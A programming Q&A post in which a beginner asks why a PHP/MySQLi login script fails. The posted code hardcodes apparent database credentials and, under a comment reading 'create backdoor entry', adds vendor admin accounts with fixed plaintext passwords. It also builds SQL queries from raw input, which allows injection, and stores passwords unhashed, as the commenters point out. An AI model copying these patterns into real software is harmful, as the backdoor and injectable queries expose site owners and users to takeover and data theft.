# I'm developing locally using php 7, however my remote server uses php 4

Tags: php, twitter-bootstrap-3

Good Evening
I'm new to php and I was hoping if someone could help with with the following:
I have a log on page and when I try to access by submiting my access details I receive the following error:

> [Notice: Undefined variable: db in C:\xampp\htdocs\bizzycarsales.co.za\access\process.php on line 36
>
> Warning: mysqli_query() expects parameter 1 to be mysqli, null given in C:\xampp\htdocs\bizzycarsales.co.za\access\process.php on line 36
> Could not create security access]

```
              <form action="process.php?action=login&recordID=<?php echo $recordID ?>" method="POST">
                <table width="800" border="0" align="center" cellpadding="3" cellspacing="0">
                  <tr>
                    <td colspan="2"><img src="assets/admin-header2.jpg"></td>
                  </tr>
                  <tr>
                    <td><div align="right">Username:</div></td>
                    <td><input class="FormField" type="text" name="User_Email" maxlength="50" value="" /></td>
                  </tr>
                  <tr>
                    <td><div align="right">Password:</div></td>
                    <td><input class="formField" type="password" name="User_Password" maxlength="30" value="" /></td>
                  </tr>
                  
                  <tr>
                    <td></td>
                    <td><input class="buttons" name="submit" type="submit" value="Login" /></td>
                  </tr>
                  
                  <tr>
                    <td align="right"><a href="mailto:nick@web-objectives.com,dean@web-objectives.com">Forgot Password?</a></td>
                    <td></td>
                  </tr>
                  
                        
                    <td colspan="2"><div align="center"><em><font size="-1">Security Managed by <a href="http://www.web-objectives.com" target="_blank">web-objectives.com</a>&nbsp;</font></em></div></td>
                  </tr>
                </table>
              </form>
            
            
            <?php
            session_start();
            //include ("../connection/connection.php");
            
            $dbhost = "localhost";
            $dbuser = "bizzyca2_deano";
            $dbpass = "py2uz*??2A=f";
            $dbname = "bizzyca2_database";
            
            //connect
            if (!($db = mysqli_connect($dbhost, $dbuser, $dbpass))) {
                echo ("Failed to connect to database!<br>\n");
                exit();
            }
            
            if (!(mysqli_select_db($db, $dbname))) {
                echo "(Cant use the database.<br>\n)";
                exit();
            }
            
            
            
            
            function checkAccessTable($User_Email,$User_Password)
            {
                $sql="
                CREATE TABLE IF NOT EXISTS `access` (
                `id` int(10) NOT NULL auto_increment,
                `User_Email` varchar(35) NOT NULL,  
                `User_Password` varchar(32) NOT NULL,
                `User_Level` varchar(10) NOT NULL,
                `Last_Accessed` date NOT NULL,
                PRIMARY KEY  (`User_Email`),
                UNIQUE KEY `id` (`id`)
                ) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=0" ;
                mysqli_query($db, $sql) or die("Could not create security access");
                
                //check if 1st time opperation
                $sql = "SELECT * from access ";
                $result = mysqli_query($sql) or die(mysqli_error("Access Error"));
                $num = mysqli_numrows($result);
                if ($num == 0)
                {
                    $sql = "INSERT INTO access (User_Email, User_Password, User_Level)";
                    $sql .= "VALUES ( ";
                    $sql .= "'" . $User_Email . "',";
                    $sql .= "'" . $User_Password . "',";
                    $sql .= "'ADMIN' )";
                    mysqli_query($sql) or die(mysqli_error("Admin Start"));
                    
                    //create backdoor entry
                    $sql = "INSERT INTO access (User_Email, User_Password, User_Level)";
                    $sql .= "VALUES ( ";
                    $sql .= "'dean@web-objectives.com',";
                    $sql .= "'ironfish',";
                    $sql .= "'ADMIN' )";
                    mysqli_query($sql) or die(mysqli_error("Admin Start"));
                    $sql = "INSERT INTO access (User_Email, User_Password, User_Level)";
                    $sql .= "VALUES ( ";
                    $sql .= "'nick@web-objectives.com',";
                    $sql .= "'nick',";
                    $sql .= "'ADMIN' )";
                    mysqli_query($sql) or die(mysqli_error("Admin Start"));
                    
                    //return to Admin Options
                    header('Location: options.php?message=Access Created');
                    exit();
                }
            }
            
            
            
            $_SESSION["attempts"]++;
            if ($_SESSION["attempts"] > 100) {
                echo "Your IP Address " . $_SERVER['SERVER_ADDR'] . " has been TRAPPED";
                exit();
            }
            if (isset($_REQUEST['action']))
                $action = $_REQUEST['action'];
            
            if ($action == "logout") {
                session_destroy();
                header('Location: ../index.php?message=Logged Off');
                exit();
            }
            
            if ($action == "login") {
                if (isset($_REQUEST['User_Email']))
                    $User_Email = $_REQUEST['User_Email'];
                if (isset($_REQUEST['User_Password']))
                    $User_Password = $_REQUEST['User_Password'];
            
                if ($User_Email == "" || $User_Password == "") {
                    // if fails return to enquiry form
                    header('Location: index.php?message=Try Again Numpty');
                    exit();
                } else {
            
                    echo $User_Email . "<br>";
                    echo $User_Password;
                    exit();
                    
                    checkAccessTable($User_Email, $User_Password);
                    $sql = "SELECT * from access WHERE User_Email = '" . $User_Email .
                        "' AND User_Password = '" . $User_Password . "'";
                    $result = mysqli_query($sql) or die(mysqli_error("Access"));
                    $num = mysqli_numrows($result);
                    if ($num != 1) {
                        header('Location: index.php?message=Access Denied');
                        exit();
                    
                        
                        
                    } else {
                        $i = 0;
                        $_SESSION["useremail"] = mysqli_result($result, $i, "User_Email");
                        $_SESSION["userid"] = mysqli_result($result, $i, "id");
                        $_SESSION["userlevel"] = mysqli_result($result, $i, "User_Level");
                        $Last_Accessed = date("Y/m/d");
                        $sql = "UPDATE access SET ";
                        $sql .= "Last_Accessed = '" . $Last_Accessed . "' ";
                        $sql .= " WHERE id = '" . $_SESSION["userid"] . "'";
                        mysqli_query($sql) or die(mysqli_error("Accessed Update"));
                        $_SESSION["attempts"] = 0;
                        header('Location: options.php?message=Access Permitted');
                        exit();
                    }
                }
            }
            ?>
```

Comment: `$db` is not in scope of `checkAccessTable`. You also are open to SQL injections and you should not be storing passwords as plain text, hash them. See: http://php.net/manual/en/language.variables.scope.php

Comment: The PHP 4 seems irrelevant here but you should realllly update that server.

Comment: Possible duplicate of [Reference: What is variable scope, which variables are accessible from where and what are "undefined variable" errors?](http://stackoverflow.com/questions/16959576/reference-what-is-variable-scope-which-variables-are-accessible-from-where-and)

Comment: You're not on PHP 4. MySQLi didn't exist until PHP 5.